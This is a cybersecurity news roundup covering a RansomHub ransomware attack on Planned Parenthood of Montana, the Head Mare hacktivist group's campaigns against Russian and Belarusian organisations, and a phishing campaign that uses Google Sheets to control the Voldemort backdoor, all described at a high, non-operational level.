Planned Parenthood Confirms Cyber Attack, Cybercriminals Exploit Google Sheets: Your Cybersecurity Roundup
Planned Parenthood Confirms Cyber Attack
Planned Parenthood of Montana has confirmed a cyberattack on its IT systems, prompting an investigation and response from federal law enforcement. RansomHub, a ransomware group, has claimed responsibility for the attack and threatened to leak 93GB of stolen data.
The incident highlights the increasing vulnerability of healthcare organizations to cyberattacks. While the full extent of the breach is still being assessed, the potential consequences for patient privacy and data security are significant.
As the investigation unfolds, it is crucial to monitor the situation closely and ensure that appropriate measures are taken to mitigate any potential harm.
Head Mare Hacktivist Group Targets Russian and Belarusian Organizations
A sophisticated hacktivist group, known as Head Mare, has emerged as a significant threat to organizations in Russia and Belarus. The group leverages advanced techniques and tools to infiltrate networks, steal sensitive data, and disrupt operations.
Head Mare exclusively targets organizations within Russia and Belarus, likely motivated by the ongoing geopolitical conflict. The group leverages recent vulnerabilities like CVE-2023-38831 to gain initial access to target systems.
The group employs custom-made malware such as PhantomDL and PhantomCore for remote access and data exfiltration. Additionally, Head Mare utilizes publicly available tools like Sliver, rockstar, ngrok, and Mimikatz to facilitate their attacks.
After gaining access to target systems, Head Mare encrypts victim data using LockBit or Babuk ransomware and demands a ransom for decryption. This can lead to significant disruptions and financial losses for targeted organizations.
Cybercriminals Exploit Google Sheets for Malware Control
A sophisticated cyber espionage campaign has been uncovered, utilizing Google Sheets as a command-and-control (C2) mechanism to target organizations worldwide. The campaign, detected by Proofpoint, impersonates tax authorities to lure victims into clicking on malicious links that ultimately deliver a custom backdoor known as Voldemort.
The attackers employ a multi-stage attack chain, starting with phishing emails that redirect victims to a landing page designed to determine their operating system. For Windows users, the landing page displays a malicious LNK file disguised as a PDF. Once executed, the LNK file leverages PowerShell and WebDAV to download and execute the Voldemort malware.
Voldemort is a sophisticated backdoor capable of gathering system information, exfiltrating data, and executing commands remotely. The malware utilizes Google Sheets as a C2 server, allowing attackers to maintain covert control over infected systems.